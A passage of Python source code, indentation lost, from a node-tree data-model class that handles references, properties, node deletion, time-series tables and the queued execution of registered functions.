remove forward references from a referencer, this also removes the backreference from the target
Args:
sourceDesc: the descriptor of the referencer node
targets: a list of descriptors, if missing we delete all
deleteDuplicates: if set true, we delete all referenes to a target if we hae more than one reference
Returns:
True/False for success
"""
changed = False
with self.lock:
fromId = self.get_id(sourceDesc)
if not fromId:
return False
if not self.model[fromId]["type"] == "referencer":
return False # only for referencers
if targetDescriptors == []:
targets = self.model[fromId]["forwardRefs"].copy()
else:
targets = self.get_id(targetDescriptors)
if targets == []:
return True# nothing to do
for toId in targets:
if not toId:
continue # we skip Nones coming from the get_id
if deleteDuplicates:
# maybe multiple entries
while toId in self.model[fromId]["forwardRefs"]: # maybe multiple entries
self.model[fromId]["forwardRefs"].remove(toId)
self.model[toId]["backRefs"].remove(fromId)
changed = True
else:
# we delete only one entry
if toId in self.model[fromId]["forwardRefs"]:
self.model[fromId]["forwardRefs"].remove(toId)
self.model[toId]["backRefs"].remove(fromId)
changed = True
if changed:
self.__notify_observers(fromId,"forwardRefs")
return True
def remove_forward_ref(self,sourceDesc,targetDesc):
"""
remove a forward reference from a referencer, this also removes the backreference from the target
Args:
sourceDesc: the descriptor of the referencer node
Returns:
True/False for success
"""
with self.lock:
fromId = self.get_id(sourceDesc)
toId = self.get_id(targetDesc)
if not fromId or not toId:
return False
if not self.model[fromId]["type"]=="referencer":
return False # only for referencers
try:
self.model[fromId]["forwardRefs"].remove(toId)
self.model[toId]["backRefs"].remove(fromId)
self.__notify_observers(fromId, "forwardRefs")
return True
except:
return False
def remove_back_ref(self,sourceDesc,targetDesc):
"""
remove a backwards reference from any node to a referencer, this also removes the forwardreferece from the target
actually, this function is just a helper. Normally, we only talk about "forward references";
each forward reference also creates a backwards reference in the model, but this is just for internal look up speed
the reference here is targetDesc -> (forwardRef) -> sourceDesc
Args:
sourceDesc: the descriptor of the node that holds a backwards reference
targetDesc: the descriptor of the node that holds the forward reference
Returns:
True/False for success
"""
with self.lock:
return self.remove_forward_ref(targetDesc,sourceDesc)
def add_property(self,nodeDesc,property,value):
"""
add a random property entry for a node, a node is a key-value store, a property is a key with a value
Args:
nodeDesc: the descriptor of the node
property: the key to be created on the node
value: the value to be stored for this property
Returns:
True for create
False for node not found or if the property already exists
"""
with self.lock:
id = self.get_id(nodeDesc)
if not id:
return False
if property in self.model[id]:
return False # have this property already
self.model[id][property]=value
self.__notify_observers(id, property)
return True
def set_properties(self,properties={},nodeDesc=None,notify=True):
"""
changes a random set of properties given by the dict or adds them if not existant, some properties are not allowed here:
children, parent, forward and back ward refs, allowed are all others including type, name, value
Args:
nodeDesc: the descriptor of the node, is optional, can also be given as browsePath or id in he properties dict
properties: the new properties or changed
Returns:
True for done
False for node not found or if the property already exists
"""
with self.lock:
if nodeDesc:
id = self.get_id(nodeDesc)
elif "id" in properties:
id = properties["id"]
elif "browsePath" in properties:
id = self.get_id(properties["browsePath"])
else:
self.logger.error("set properties is missing id ")
return False
if not id:
return False
notificationProperties = []
for k,v in properties.items():
if k in ["id","browsePath","children","parent","forwardRefs","backRefs"]:
continue # we ignore these entries
self.model[id][k]=v # overwrite or set new
notificationProperties.append(k)
if notify:
self.__notify_observers(id,notificationProperties)
return True
def find_all_children_recursive(self,nodeIds):
""" find all children recursively, give a list of """
with self.lock:
children = []
for id in nodeIds:
if self.model[id]["children"]:
children.extend(self.find_all_children_recursive(self.model[id]["children"]))
children.append(id)
return children
#delete node and all subnodes
def delete_node(self,desc):
"""
delete a node and all its recursive children;
flow:
1) make a list of all nodes to be deleted
2) rip off all references to /from delete nodes
3) delete all nodes
4) notify observers about children change on the delete nodes
desc(string): the descriptor of the node
Returns:
True for success
False for node not found
"""
with self.lock:
id = self.get_id(desc)
if not id:
return False
nodesToDelete = self.find_all_children_recursive([id])
self.logger.debug(f"delete nodes {nodesToDelete}")
childNotify = []
#first rip off all references
for id in nodesToDelete:
forwards = self.model[id]["forwardRefs"].copy()
backwards = self.model[id]["backRefs"].copy()
for forward in forwards:
self.remove_forward_ref(id,forward) # this will also trigger observers
for backward in backwards:
self.remove_back_ref(id,backward) # this will also trigger observers
#now delete the acutal nodes
for id in nodesToDelete:
parentId = self.model[id]["parent"]
if parentId in self.model:
self.model[parentId]["children"].remove(id)
childNotify.append(parentId)
if self.model[id]["type"]=="timeseries":
self.time_series_delete(id)
del self.model[id]
#now notify only those who still exist
goodNotify=[]
for id in childNotify:
if id in self.model:
goodNotify.append(id)
if goodNotify:
self.__notify_observers(goodNotify, "children") # make ONE call for the observers
return True
# if desc.type is a var, function then we just set the value
# if it's a timeseries" then we set a column in a table, padded if needed
def set_value(self,desc,value):
"""
set the value property of a node, if the node does not have a value property yet, it is created here
Args:
desc(string): node descriptor
value (any): any value to be stored
"""
with self.lock:
id = self.get_id(desc)
if not id: return None
#convert if table:
if self.model[id]["type"] == "column":
value = numpy.asarray(value,dtype=numpy.float64)
self.model[id]["value"] = value
self.__notify_observers(id,"value")
return True
def get_value(self,desc):
"""
read out the "value" property of a node
Args:
desc(string): the node that holds the value
Returns:
the value
None if the node has no "value" property
"""
with self.lock:
id = self.get_id(desc)
if not id: return None
if self.model[id]["type"] == "timeseries":
values = self.time_series_get_table(id)
if values:
return self.time_series_get_table(id)[id]["values"]
else:
return None
if "value" in self.model[id]:
return copy.deepcopy(self.model[id]["value"])
else:
return None
def __copy_node(self,id,resolveChildren=False):
"""
get a copy of a node, we don't create a node in the model here!
copy node with all properties, if the node is a "column", we don't copy the value
if the resolveChildren is set to true, we also copy the direct children
the copied node can't be used to create a node, as it is the copy of an existing node!
Args:
id (string): the node id to be copied
resolveChildren (bool): False to not copy the children (the new node has no children)
True to copy-create also the children
Return:
(dict) the node
"""
newNode = {}
for key in self.model[id]:
if key == "value" and self.model[id]["type"]in ["column","file","timeseries"]:
newNode["value"]=None
elif key == "children" and resolveChildren:
#we also copy the children
newNode["children"]=[]
for childId in self.model[id]["children"]:
childNode = self.__copy_node(childId)
newNode["children"].append(childNode)
elif key == "object":
continue
else:
newNode[key]=copy.deepcopy(self.model[id][key])
return newNode
def __get_targets(self,id,includeNodeInfo=True):
"""
#this is a recusive helper function for the get_leaves function
"""
targets=[]
if self.model[id]["type"] == "referencer":
for targetId in self.model[id]["forwardRefs"]:
targets.extend(self.__get_targets(targetId,includeNodeInfo))
elif self.model[id]["type"] == "folder":
for targetId in self.model[id]["children"]:
targets.extend(self.__get_targets(targetId,includeNodeInfo))
else:
if includeNodeInfo:
addNode = self.__copy_node(id,resolveChildren=True)
addNode["browsePath"]=self.get_browse_path(id)
else:
addNode={"id":id,"children":self.model[id]["children"]}
targets = [addNode]
return targets
def get_leaves_ids(self,desc):
"""
get the list of ids of the leaves, see get_leaves()
Returns:
a list of ids of the leaves
"""
leaves = self.get_leaves(desc) # a list of node dicts
leaveIds = []
for leave in leaves:
leaveIds.append(leave["id"])
return leaveIds
def get_leaves(self,desc,allowDuplicates=False,includeNodeInfo=True):
"""
Args:
includeNodeInfo : if set true, we get the properties of the node, else we only get the id
this function returns a list of dicts containing the leaves where this referencer points to
this functions works only for nodes of type "referencer", as we are following the forward references
leaves are defined as following:
1) all nodes that are listed under the forward references and which are not of type referencer or folder
2) if nodes pointed to are referencer, the targets are again analyzed
3) if a node pointed to is a folder, all children of the folder are taken which are not referencer or folder themselves
folders and referencers inside the folder are not taken into account
doing so, hierarchies of referencers are unlimited, hierarchies of folders are only of depth 1
Returns:
all node dicts which are considered leaves as a list of node dicts
"""
with self.lock:
id = self.__get_id(desc)
if not id:return None
targets=self.__get_targets(id,includeNodeInfo)
if targets and targets[0]["id"] == id:
#this can happen if the node is not a folder, ref and had no children
targets.pop(0)
#before we return, we remove duplicates if wanted
if targets and allowDuplicates == False:
reducedTargets = []
ids = []
for t in targets:
if t["id"] in ids:
continue
reducedTargets.append(t)
ids.append(t["id"])
return reducedTargets
else:
return targets
def get_widget_view(self,desc,version):
""" get a set of nodes and info thereof to save a view """
with self.lock:
id = self.__get_id(desc)
if not id: return {}
widget = self.get_node(id)
if widget.get_type()!="widget" or version!=1:
return {}
result = {}
#now collect all info
values = ["currentColors","startTime","endTime","hasAnnotation.visibleTags","visibleElements","autoScaleY","panOnlyX","streamingMode","hasEvents.visibleEvents"]
refs = ["selectedVariables"]
for v in values:
result[v]={"value":widget.get_child(v).get_value()}
for r in refs:
referencerId = widget.get_child(r).get_id()
self.model[referencerId]["forwardRefs"]
result[r]={"references":self.model[referencerId]["forwardRefs"]}
#special handling for showhide dynamic menu
showHide = widget.get_child("showHide")
if showHide:
for child in showHide.get_children():
result["showHide."+child.get_name()]={"value":child.get_value()}
return result
def set_widget_view(self,desc,viewInfo):
"""
write a set of info to a widget for restoring a view
"""
if viewInfo["version"]!= 1:
return False
valueNotifyIds=[]
refNotifyIds=[]
with self.lock:
id = self.__get_id(desc)
if not id: return False
widget = self.get_node(id)
if widget.get_type()!="widget":
return False
self.disable_observers()
try:
for k,v in viewInfo["nodes"].items():
if k.startswith("showHide"):
target = widget.get_child(k)
if target:
target.set_value(v["value"])
else:
if "value" in v:
child = widget.get_child(k)
child.set_value(v["value"])
valueNotifyIds.append(child.get_id())
if "references" in v:
child = widget.get_child(k)
self.remove_forward_refs(child.get_id())
self.add_forward_refs(child.get_id(),v["references"])
refNotifyIds.append(child.get_id())
except:
pass
self.enable_observers()
self.notify_observers(valueNotifyIds,["value"])
self.notify_observers(refNotifyIds,["forwardRefs"])
return True
def get_annotations_fast(self,desc):
"""
this is a helper function for the ui for the fast retrieval of annotations
Args: desc: the root[referencer] descriptor for the annotations
Returns:
a dict with {id:{"name":...,"id":{...}} with the annotations
"""
with self.lock:
id = self.__get_id(desc)
if not id: return {}
onlyid = self.get_leaves(desc, includeNodeInfo=False,allowDuplicates=True) #allow duplicates makes it faster, we get rid of duplicates later
result = {}
for small in onlyid:
id = small["id"]
if self.model[id]["type"] != "annotation":
continue
big = {"id": id}
big["browsePath"] = self.get_browse_path(id)
big["name"] = self.model[id]["name"]
# now look at the children
for childId in small["children"]:
name = self.model[childId]["name"]
type = self.model[childId]["type"]
if type== "referencer":
if len(self.model[childId]["forwardRefs"]):
big[name]=self.get_browse_path(self.model[childId]["forwardRefs"][0])
else:
big[name] = None
else:
big[name] = self.model[childId]["value"]
result[id] = big
return result
def __get_referencer_parents(self,ids):
backRefs = []
#we look back from this node
for id in ids:
if self.model[id]["type"] == "referencer":
#we take this one in
backRefs.append(id)
#plus we look further up
thisBackRefs = self.model[id]["backRefs"]
if thisBackRefs:
backRefs.extend(self.__get_referencer_parents(thisBackRefs))
return backRefs
def get_referencers_old(self,desc):
"""
find the referencers pointing to a node via the "leaves algorithm"
initially, we take the parent and the backref referencers
Args:
deep: we support the reverse leave-algorithms including any depth of children level after the last referencer,
e.g. a leaves-path of referencer -> referencer -> nodes -> child ->child is a valid match
"""
with self.lock:
id = self.__get_id(desc)
if not id:return None
ids = [self.model[id]["parent"],id]
if "0" in ids:
ids.remove("0")
referencers = self.__get_referencer_parents(ids)
return referencers
def get_referencers(self,desc,deepLevel = 1):
"""
find the referencers pointing to a node via the "leaves algorithm"
initially, we take the parent and the backref referencers
Args:
deepLevel: we support the reverse leave-algorithms including any depth of children level after the last referencer,
e.g. a leaves-path of referencer -> referencer -> nodes -> child ->child is a valid match
we give the number of parent levels to include in the search at the leaves
default is 1, so the node itself and its parent
"""
with self.lock:
id = self.__get_id(desc)
if not id:return None
if not deepLevel:
ids = [self.model[id]["parent"],id]
else:
ids = self._get_parents(id,deepLevel)
if "0" in ids:
ids.remove("0")
referencers = self.__get_referencer_parents(ids)
return referencers
def _get_parents(self,id,deepLevel = -1):
ids = []
while id != "1" and deepLevel >= 0:
ids.append(id)
deepLevel -=1
id = self.model[id]["parent"]
return ids
#get a table with values like in the table stored, start and end times are optional
# if start, end not given, then we get the full table with no postprocessing at all
def get_timeseries_table_old(self,variables,startTime=None,endTime=None,noBins=None,agg="sample",includeTimeStamps=None,includeBackGround=None):
with self.lock:
variables = self.get_id(variables)
return self.timeSeriesTables.get_value_table(variables, startTime=startTime, endTime=endTime, noBins=noBins,
agg=agg,
includeTimeStamps=includeTimeStamps) # ,startTime,endTime)
'''
if startTime == None and endTime ==None:
#request the full table
variables = self.get_id(variables) # convert all to ids
return self.timeSeriesTables.get_value_table(variables,startTime=startTime,endTime=endTime,noBins=noBins,agg=agg,includeTimeStamps=includeTimeStamps)#,startTime,endTime)
else:
# this is a more details request, we will try to deliver the data in bins and with
# aggretation postprocessing
variables = self.get_id(variables) # convert all to ids, not browsepath
return self.timeSeriesTables.get_value_table(variables,startTime,endTime,noBins,agg,includeTimeStamps=includeTimeStamps)
'''
#used in the Node class, give a column variable or the table itself, return the nodeid of the time variable of that table
def find_table_time_node(self,desc):
with self.lock:
table = self.__find_table(self.get_id(desc))
if not table:
return None
pathToTimeIndex = self.get_browse_path(table)+".timeField"
timeColumnId = self.get_leaves(pathToTimeIndex)[0]['id'] # this referencer must point to only one node
return timeColumnId
def find_table_node(self,desc):
"""
get the node id of a table giving a column node of the table as input
Args
desc[string]: a node descriptor of a column node belonging to the table
Returns:
the node id of the table node
"""
with self.lock:
return self.__find_table(desc)
def get_child(self,desc,childName):
"""
get a child based on the name given
Args:
desc: node descriptor of the node under which we look for children
name: the child name to look for
Returns:
a nodeid if we find the child with "name" under the desc or none if not found
:return:
"""
with self.lock:
nodeInfo = self.get_node_info(desc)
if nodeInfo:
for childId in nodeInfo['children']:
childInfo = self.get_node_info(childId)
if childInfo["name"] == childName:
return childId
return None
def get_children_dict(self,desc):
"""
create a dictionary with key= childName and value = nodedict
Args:
desc: the nodedescriptor
Returns:
a dict
"""
with self.lock:
childrenDic={}
id = self.get_id(desc)
if not id:
return None
for childId in self.model[id]["children"]:
child = self.get_node_info(childId)
childrenDic[child["name"]]=child
return childrenDic
def get_table_len(self,desc):
"""
get the current length of a table
Args:
desc: the node descriptor of type table
Returns:
the current length of the columns of the table, none if error
"""
with self.lock:
tableId = self.get_id(desc)
if not tableId: return None
if not self.model[tableId]["type"]=="table": return None
try:
columnid = self.get_child(tableId,"columns")
if not columnid: return None
columnIds = self.get_leaves_ids(columnid)
if columnIds:
return len(self.model[columnIds[0]]["value"])
except:
return None
def get_timeseries_table(self,variables,startTime=None,endTime=None,noBins=None,agg="sample",includeTimeStamps=None,format="array",includeBackGround=None):
"""
get a time series table from variables. The table is returned as a list[list] object
all variables requested must be of type "column" and must belong to the same table:
all columns requested here must have a direct backreference to the same node of type "columns"
todo: also allow "columns" to point to folders or multiple hierarchies of referencing/folders
Args:
variables (list(nodedescriptors)): nodes to be part the data table requested (ordered!)
startime, endTime: the start and endtime of the table given as seconds since epoch
#we also allow the special case of endTime = 0 and startTime = -interval
# we also allow the special case of startTime given and end time= 0
noBins(int): the number of samples to be returned inside the table between start end endtime,
if None is given, we return all samples (rows) we have in the table and to not aggregate
agg(string): the aggregation function to be used when we downsample the data,
"sample": this means, we just pick out values (we sample) the data set, this is actually not an aggregation
includeTimesStampe (bool): currently ignored
includeBackGround (bool): currently ignored
Returns(dict)
key : value
"__time" : list of timestamps for the returned table in epoch seconds
"variable1": the list of float values of one of the requested variables
"""
with self.lock:
#first check if all requested timeseries are columns from the same table
vars = self.get_id(variables)
table = []
for var in vars:
if self.model[var]["type"] != "column":
self.logger.warn("requested time series but not column type")
return False
table.append(self.__find_table(var))
if len(set(table)) != 1 or set(table)== {None}:
self.logger.warning("not the same table")
return False
#get the time field, and make fancy indexing via numpy arrays
pathToTimeIndex = self.get_browse_path(table[0])+".timeField"
timeColumnId = self.get_leaves(pathToTimeIndex)[0]['id']
if startTime and endTime:
times = numpy.asarray(self.model[timeColumnId]["value"])
indices = numpy.where((times>=startTime) & (times<=endTime))[0]
#xxx todo find the right index
elif startTime and not endTime:
#special cases for [-startTime:] and [startTime:] requests
if startTime < 0:
#this is the special case that we take an interval from the end
endTime = self.model[timeColumnId]["value"][-1]# the last
startTime = endTime +startTime # as startTime is negative this is actually substraction
else:
#starttime is positive
pass
times = numpy.asarray(self.model[timeColumnId]["value"])
indices = numpy.where(times >= startTime)[0]
else:
indices = numpy.arange(0,len(self.model[timeColumnId]["value"])) ## all indices
#now resample the indices to have the right bins number
if noBins:
varIndices = np.linspace(indices[0], indices[-1], noBins, endpoint=False, dtype=int)
else:
varIndices = indices
if format=="array":
result = []
for var in variables:
original = np.asarray(self.model[self.get_id(var)]["value"])[varIndices] # fancy indexing
data=original.tolist() # apply the selection with the indices list
result.append(data)
else:
result = {}
for var in variables:
original = np.asarray(self.model[self.get_id(var)]["value"])[varIndices] # fancy indexing
data = original.tolist() # apply the selection with the indices list
result[var]=data
result["__time"]=np.asarray(self.model[timeColumnId]["value"])[varIndices].tolist()
return result
def add_timeseries(self,blob,fast=False):
"""
add a dictionary of variables to a table, we check if the variables belong to the same table
also, times that come in as datetime object are converted to epoch seconds
Args:
blob (dict): a dictionary containing keys (node descriptors) and values (scalars)
Returns:
True/False for success
"""
with self.lock:
table = []
for key in blob:
id = self.get_id(key)
if not id:
self.logger.warn("add_timeseries count not find the variable:" + str(key))
return False
if self.model[id]["type"] != "column":
self.logger.warn("requested time series but not column type")
return False
table.append(self.__find_table(id))
if len(set(table)) != 1 or set(table) == {None}:
self.logger.warn("not the same table")
return False
#here, the request is parsed as ok, let's put the values
for key in blob:
id = self.get_id(key)
value = blob[key]
if type(self.model[id]["value"]) is not list:
self.model[id]["value"]=[]
#we auto-convert time stamps
if type(value) is datetime.datetime:
value = date2secs(value)
self.model[id]["value"].append(value)#finally put the value
#return the id of the table, give a column variable
def __find_table(self,desc):
"""
return the node id of the table, give a column variable
!! this has no lock, must be called under lock
Args:
desc(string): node descriptor of type column or the table itself
Returns:
the node id of the table to which the desc node belongs
"""
id = self.get_id(desc)
if not id: return False
if self.model[id]["type"] == "table":
return id
for ref in self.model[id]["backRefs"]:
if self.model[ref]["name"] == "columns":
return self.model[ref]["parent"]
return None
def ts_table_add_blob(self,dataBlob):
"""
this function add a data blob to an existing table, it accepts multiple values at once to speed up internals
Args:
dataBlob (dict or list(dict)): containing key:value pair with key=a descriptor of a column of one table
value: a scalar or list or numpy array of values
"""
if type(dataBlob) is list:
self.logger.error("currently no support for list blobs")
return None
with self.lock:
#first find the table and decide for the type conversion
for key in dataBlob:
if key != '__time':
tableId = self.__find_table(key)
break
if not tableId:
self.logger.error("can't find the table of "+str(dataBlob[list(dataBlob.keys())[0]]))
tableNode =self.get_node(tableId)
columnsType = numpy.float64 # this is the default
# make sure the time is there and convert it: we accept datetime objects, iso strings or floats seconds
# plus, the key will be the time node id afterwards
timeNode = tableNode.get_child("timeField").get_leaves()[0]
#try to find the time entry in the dataBlob, rename it to the timenode id
timeKeyOptions = ['__time',timeNode.get_browse_path(),timeNode.get_id()]
for timeKeyOption in timeKeyOptions:
if timeKeyOption in dataBlob:
dataBlob[timeNode.get_id()] = dataBlob.pop(timeKeyOption) # from now on the time field is names as its browsepath
break
if timeNode.get_id() not in dataBlob:
self.logger.error("time field entry missing")
return False
#now check if all are on the same table and convert the keys to node ids
variables = list(dataBlob.keys())
for var in variables:
if self.__find_table(var) != tableId:
self.logger.error("variables are not on the same table")
return False
id = self.get_id(var)
if id != var:
dataBlob[self.get_id(var)]=dataBlob.pop(var) # make new entry as nodeid
#now check the sizes of the incoming data and convert them to the requested type
inputSizes = set()
for key,value in dataBlob.items():
if key == timeNode.get_id():
#if we handle the time node, we might have to convert
if type(value) is list or type(value) is numpy.ndarray:
newValues = []
#newValues = numpy.asarray([],dtype=numpy.float64)
for val in value:
newValues.append(date2secs(val))
dataBlob[key] = numpy.asarray(newValues,dtype=numpy.float64) # write it back to the data
else:
#it is a scalar
dataBlob[key] = numpy.asarray([date2secs(value)],dtype=numpy.float64)
else:
if numpy.isscalar(dataBlob[key]):
dataBlob[key]=numpy.asarray([dataBlob[key]],dtype=columnsType) # make a list if it is scalar
else:
dataBlob[key]=numpy.asarray(dataBlob[key],dtype=columnsType) # if it is a numpy array already, numpy makes no copy
inputSizes.add(dataBlob[key].shape[0])
if len(inputSizes)!=1:
self.logger.error("incoming data has different len, can't hande as padding is unclear")
# when we are here, we have converted all incoming data ot numpy arrays, all belong to the same table
# and all have the same length, we are ready to put them inside
#print("through")
#now append them
return self.__ts_table_add_row(dataBlob,tableNodeId=tableId)
def __ts_table_add_row(self,dataBlob,tableNodeId=None,autoPad=True,pad=numpy.NaN):
"""
must be called under lock !!
this function accepts a dataBlob which is ready to be inserted, we don't make any more checks here
it must use variables from one table, it must contain data as numpyarrays
variables of the tables which are missing will be filled with pad if autoPad is true
"""
if not tableNodeId:
tableNode = self.get_node(self.__get_table(list(dataBlob.keys())[0]))
else:
tableNode = self.get_node(tableNodeId)
dataLen = dataBlob[list(dataBlob)[0]].shape[0]
columnNodes = tableNode.get_child("columns").get_leaves()
for columnNode in columnNodes:
id = columnNode.get_id()
if id in dataBlob:
#we add that one to the table
if type(self.model[id]['value']) != numpy.ndarray:
self.model[id]['value'] = dataBlob[id]
else:
self.model[id]['value'] = numpy.append(self.model[id]['value'],dataBlob[id])
else:
#we must pad
self.loger.debug("we are padding "+id+" with % ",dataLen)
if type(self.model[id]['value']) != numpy.ndarray:
self.model[id]=numpy.full(dataLen,numpy.nan)
else:
self.model[id]['value'] = numpy.append(self.model[id]['value'],numpy.full(dataLen,numpy.nan))
return True
def append_table(self,blob,autocreate=True,autopad=True, timeSorted = False):
"""
this function accepts a dictionary containing paths and values and adds them as a row to a table
if autoPad is True: it is allowed to leave out columns, those will be padded with numpy.inf,
if autocreate is True: it is allowed to add unknown colums, those will be added automatically under the given name
Args:
blob(dict):
keys: node descriptors,
values: value to be appended to the table (scalar or list per variable is allowed
the times should be given in a variable ending with ".time"
if the table exists already and has another node for the time-values, then we take the .time values and put them on the timenode
autocreate(bool): if set to true and the nodes or table in the dict do not exist yet, we autocreate a table
autopad(bool) if set to true, we automatically pad values in an existing table if variables of the table are not part of the blob
doing so, we keep consistent lenght for all columns of a table
"""
#first check if we need to autocreate something, also check if we have multiple tables in play
with self.lock:
autocreates = []
tableId = None
columnsId = None
numberOfRows = None
for key in blob:
id = self.__get_id(key)
if not id:
if not autocreate:
self.logger.warn("appending table with unknown variables")
return None
else:
#we create this thing later
autocreates.append(key)
else:
#the id was found, let's find the right table
for ref in self.model[id]["backRefs"]:
if self.model[ref]["name"] == "columns":
#this is our table
if not tableId:
tableId = self.model[ref]["parent"]
columnsId = ref
numberOfRows = len(self.model[id]["value"])
else:
if tableId != self.model[ref]["parent"]:
self.logger.warn("mixed tables request")
return None
self.logger.debug("append table "+str(self.get_browse_path(tableId)))
if autocreates and autocreate:
#do we even have to create our table?
if not tableId:
#make a table structure based on the names given
tableName = autocreates[1].split('.')[1]+"_autotable"
tableId = self.create_node(parent="root",name=tableName,properties={"type":"table"})
columnsId = self.create_node(parent=tableId,name="columns",properties={"type":"referencer"})
timeId = self.create_node(parent=tableId, name="timeField", properties={"type": "referencer"})
numberOfRows=0
else:
#if we don't create the table, here is our timeId
timeReferencer = self.get_child(tableId, "timeField")
timeId = self.get_leaves_ids(timeReferencer)[0]
#we also then don't create any new time-field
autocreates = [path for path in autocreates if path[-5:]!=".time"]
self.logger.debug(f"table var autocreates: {autocreates}")
for path in autocreates:
id = self.create_node_from_path(path,properties={"type":"column"})
self.model[id]["value"]=numpy.full(numberOfRows,numpy.inf)
self.add_forward_refs(columnsId,[id])
if path.split('.')[-1]=="time":
#we just created the time field, we must also give the table struct the info
self.add_forward_refs(timeId,[id])
tableColumnIds = self.get_leaves_ids(columnsId) # a list of the ids of the columns
timeReferencer = self.get_child(tableId,"timeField")
timeId = self.get_leaves_ids(timeReferencer)[0]
timePath = None
for path in blob:
if path[-5:] == ".time":
timePath = path
if not timePath:
self.logger.error("no time path given")
return False
#now make arrays of all values
for k,v in blob.items():
if type(v) is list or type(v) is numpy.ndarray:
blob[k]=numpy.asarray(v,dtype=numpy.float64)
else:
blob[k] = numpy.asarray([v], dtype=numpy.float64)
valuesLen = len( blob[list(blob.keys())[0]] )
tableLen = len ( self.get_value(timeId))
if not timeSorted:
#just append
for path in blob:
if path.split('.')[-1]=="time":
id = timeId # we take the existing time Node of the table instead of just the variable named "time"
else:
id = self.get_id(path) # here
self.model[id]["value"] = numpy.append(self.model[id]["value"],blob[path]) #todo: this is a very inefficient copy and reallocate
if id in tableColumnIds:
tableColumnIds.remove(id)
#append this value
for id in tableColumnIds:
self.model[id]["value"] = numpy.append(self.model[id]["value"],numpy.full(valuesLen,numpy.inf,dtype=numpy.float64)) # pad the remainings with inf
#now trigger observser
self.__notify_observers(self.get_leaves_ids(columnsId),"value")
else:
#time sorted: find a place to insert the data in the times
currentTimes = numpy.asarray(self.get_value(timeId),dtype=numpy.float64)
startTime = blob[timePath][0]
endTime = blob[timePath][-1]
firstIndexGreaterStart, = numpy.where(currentTimes>startTime) #where returns tuple
if len(firstIndexGreaterStart) == 0:
firstIndexGreaterStart = tableLen
else:
firstIndexGreaterStart=firstIndexGreaterStart[0]
firstIndexGreaterEnd, = numpy.where(currentTimes > endTime)
if len(firstIndexGreaterEnd) == 0:
firstIndexGreaterEnd = tableLen
else:
firstIndexGreaterEnd=firstIndexGreaterEnd[0]
if firstIndexGreaterEnd != firstIndexGreaterStart:
self.logger.error("we can't insert the data in a row-wise time manner, only as block")
return False
startIndex = firstIndexGreaterStart # the position to insert the incoming data
self.logger.debug(f"insert data @{startIndex} of {tableLen}")
for path in blob:
if path.split('.')[-1]=="time":
id = timeId # we take the existing time Node of the table instead of just the variable named "time"
else:
id = self.get_id(path) # here
self.model[id]["value"] = numpy.insert(self.model[id]["value"],startIndex,blob[path]) #todo: this is a very inefficient copy and reallocate
if id in tableColumnIds:
tableColumnIds.remove(id)
#append this value
for id in tableColumnIds:
self.model[id]["value"] = numpy.insert(self.model[id]["value"],startIndex,numpy.full(valuesLen,numpy.inf,dtype=numpy.float64)) # pad the remainings with inf
#
pass
return True
def __show_subtree(self,rootId):
currentBrowsePath = self.get_browse_path(rootId)
indentation = "| "*(len(currentBrowsePath.split('.'))-1)
print (indentation+"-",self.model[rootId]["name"],end="")
noShowProperties=["name","parent","children"]
for property in self.model[rootId]:
try:
if property=="value" and len(self.model[rootId]["value"])>10:
print(",len:"+str(len(self.model[rootId]["value"])),end="")
except:
pass
if not property in noShowProperties:
try:
#if this entry has a len and the len is larger then 20, show only a part of it
if len(self.model[rootId][property]) > 10:
print("," + property + "=" + str(self.model[rootId][property][0:10])+"...("+str(len(self.model[rootId][property]))+")", end="")
else:
print("," + property + "=" + str(self.model[rootId][property]), end="")
except:
print("," + property + "=" + str(self.model[rootId][property]), end="")
if self.model[rootId]["type"]=="timeseries":
print(","+self.time_series_get_info(rootId), end="")
print("")
for child in self.model[rootId]["children"]:
self.__show_subtree(child)
def execute_object_function(self,desc,functionName,parameter=None):
with self.lock:
id = self.get_id(desc)
object = self.get_object(id)
if not object:
return False
try:
functionPointer = getattr(object,functionName)
self.executionQueue.put({"functionPointer":functionPointer,"parameter":parameter,"id":id})
return True
except:
self.logger.error(f"function {functionName} not sttr of object {desc} {object}")
return False
def execute_function(self,desc,parameter = None):
"""
create a thread to execute a function there,
if the function has autoReload, we re-import the external
file
Args:
desc: node descriptor of the node (type "function") to be executed
Returns:
True if the execution thread was launched
"""
with self.lock:
id = self.get_id(desc)
if self.model[id]["type"]!= "function":
return False
functionName = self.model[id]["functionPointer"]
if not functionName in self.functions:
self.logger.error(f"can't find function {functionName} in global list")
return False
functionNode = self.get_node(id)
executionType = functionNode.get_child("control").get_child("executionType").get_value()
if executionType in ["async","sync"]:
self.executionQueue.put(id)
self.logger.info(f"function {desc} queued for execution")
return True
elif executionType =="threaded":
self.logger.info(f"function {desc} started in thread")
thread = threading.Thread(target=self.__execution_thread, args=[id])
thread.start()
return True
else:
self.logger.error(f"function {desc} cant be started, unknown execution type {executionType}")
return False
#check if function is interactive, then we reload it right now
if self.model[id]["autoReload"] == True and self.global_auto_reload_enabled():
#if self.functions[functionName]["isInteractive"]:
# must reload the module
module = importlib.reload(self.functions[functionName]["module"])
functionPointer = getattr(module,functionName.split('.',1).pop())
#now update our global list
self.functions[functionName]["module"] = module
self.functions[functionName]["function"] = functionPointer
#here, the lock is open again!
try:
if executionType == "async" or executionType == "threaded":
thread = threading.Thread(target=self.__execution_thread, args=[id])
thread.start()
return True
elif executionType == "sync":
self.__execution_thread(id) # call it sync here
return True
else:
self.logger.error("unsupported execution type"+str(executionType)+" in function"+str(id))
raise(Exception)
except:
return False
def start_function_execution_thread(self):
self.functionExecutionRunning = True
self.functionExecutionThread = threading.Thread(target=self._function_execution_thread)
self.functionExecutionThread.start()
def _function_execution_thread(self):
while self.functionExecutionRunning:
try:
nextId = self.executionQueue.get(timeout=1)
self.logger.info(f"now executing function {str_lim(nextId,300)}")
self.__execution_thread(nextId)
except:
pass
def delete(self):
self.functionExecutionRunning = False
def exit(self):
self.delete()
def close(self):
self.delete()
def __dispatch(self,function,timeout,param):
thread = threading.Thread(target=self.__dispatch_thread_function, args=[function,timeout,param])
thread.start()
def __dispatch_thread_function(self,function,timeout,param):
time.sleep(timeout)
function(param)
#exit thread
def reset_progress_bar(self,controlNode):
controlNode.get_child("progress").set_value(0)
def __clone_children(self,source,dest):
""" see def clone() for more info """
sourcePath = self.get_browse_path(source)
destPath = self.get_browse_path(dest)
for childName,childInfo in self.get_children_dict(source).items():
childId = childInfo["id"]
if childInfo["type"] in ["timeseries","file","column","object"]:
self.logger.debug(f"clone skip node {childInfo['name']}")
continue
newProps = {k:v for k,v in childInfo.items() if k not in ["parent","children","backRefs","forwardRefs","browsePath","id","name"]}
cloneId = self.create_node_from_path(destPath+"."+childInfo["name"],properties=newProps)
